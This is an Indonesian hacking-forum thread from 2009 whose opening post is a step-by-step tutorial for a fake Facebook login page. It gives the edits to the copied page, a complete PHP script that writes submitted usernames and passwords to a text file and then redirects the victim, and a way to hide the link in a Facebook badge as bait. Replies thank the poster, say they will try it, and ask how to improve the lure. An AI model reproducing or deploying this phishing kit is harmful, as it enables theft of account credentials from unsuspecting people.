Page 1 of 3

[POC] simple idea fakelogin facebook

Posted: Fri Aug 28, 2009 2:51 am
by Xshadow
dibutuhkan sedikit kesabaran untuk mencari hasil "tangkapan" dari kail yang kita pasang... :)

recruitment:
- text editor (notepad, wordpad, editplus, geany, notepad++, dll)
- ketelitian
- kesabaran :)
- hosting gratisan atau hasil inject
Concept...
kita gunakan "badge" facebook :)
kemudian edit/setting sebagus mungkin badge anda, kemudian kita buat untuk umpan :)

ok langsung saja...
1. kita buat fake login-nya :)
- logout facebook anda terlebih dahulu
- buka halaman depan facebook
- view source
- copy source
- paste source di editor (saya menggunakan editplus)
- cari "method",
- method="post" ganti dengan method="get"
- cari "action"
- action="URLasli" ganti dengan action="log.php"
- simpan dalam bentuk html ex: index.html
2. buat file log.php
isinya:

Code: Select all

<?php
header("Location: ");
$handle =
fopen("passwords.txt", "a");
foreach($_GET as
$variable => $value) {
fwrite($handle,
$variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle,
"\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
ganti header("Location: "); dengan header("Location:http://xxx.com");
dimana maksud dari code tersebut yaitu ketika target meng-klik "Login/Masuk" maka dia akan redirect ke url tersebut

ganti juga password.txt dengan nama terserah
simpan file log.php :)

2. buka facebook anda dan login :)
3. masuk ke url ini http://www.facebook.com/facebook-widget ... badges.php
4. atur secantik mungkin :P FINISH?!?!?
5. ambil code-nya
misal :

Code: Select all

   <!-- Facebook Badge START -->
   <a href="http://www.facebook.com/xshadow" title="Satya Permana Putra" target="_TOP" 
   style="font-family: "lucida grande",tahoma,verdana,arial,sans-serif; 
   font-size: 11px; font-variant: normal; font-style: normal; font-weight: normal; 
   color: #3B5998; text-decoration: none;">
   <img src="http://www.facebook.com/badge.php?id=1263018894&bid=210&key=1299911766&format=png&z=1070161121" 
   alt="http://www.facebook.com/badge.php?id=1263018894&bid=210&key=1299911766&format=png&z=1070161121"/></a>
   <!-- Facebook Badge END -->
   
nah url http://www.facebook.com/xshadow diganti dengan url fake login anda :D moga2 aja target gak tau :p

6. pasang code diatas di web anda... di forum anda... tapi ingat... ABC (Arena Bocah CukDu$), gak tanggung jawab :P

Re: [POC] simple idea fakelogin facebook

Posted: Fri Aug 28, 2009 7:33 am
by blocko20
thx's master atas inponya... :mrgreen: :mrgreen:

segera dipraktekin..

Re: [POC] simple idea fakelogin facebook

Posted: Fri Aug 28, 2009 7:56 am
by papa ieone
Mantabs

Re: [POC] simple idea fakelogin facebook

Posted: Fri Aug 28, 2009 11:24 am
by vodork
wew mantabs om
matur nuwun yak
praktek

Re: [POC] simple idea fakelogin facebook

Posted: Fri Aug 28, 2009 11:29 am
by defacement88
we'i kucink unjuk taring&cakar :mrgreen:

Re: [POC] simple idea fakelogin facebook

Posted: Fri Aug 28, 2009 9:19 pm
by herman_pick
langsung ke TKP om..... :arrow: :arrow: :arrow:


Thankz om atas infonya... :roll: :roll:

nice share.. :mrgreen: :mrgreen: :mrgreen:

Re: [POC] simple idea fakelogin facebook

Posted: Sun Aug 30, 2009 5:36 am
by Darkzzzz
Cukdus negh ^^ QRen om ... :mrgreen:
Qira" cara social engineeringnya yg tpt gmn y om? :?:
Mslh utamanya kan URL nya :D
Trs itu kan pke metode href alias anchor klo gk sala namanya, so... Org kan gk sembarangan nge-klik :|

Re: [POC] simple idea fakelogin facebook

Posted: Mon Oct 05, 2009 6:45 pm
by cextor
keren2 .
mksh kk inpo nya :D :D

Re: [POC] simple idea fakelogin facebook

Posted: Sat Oct 31, 2009 1:11 am
by adietXcode
seep juragan....
tapi gan gak ada cara laen selaen pasang di web ya, di FBnya mungkin, kaya dulu waktu ngerjain prenster :lol: :lol: :lol:

btw, Xshadow pa kabar neh, lama tak jumpa... :mrgreen: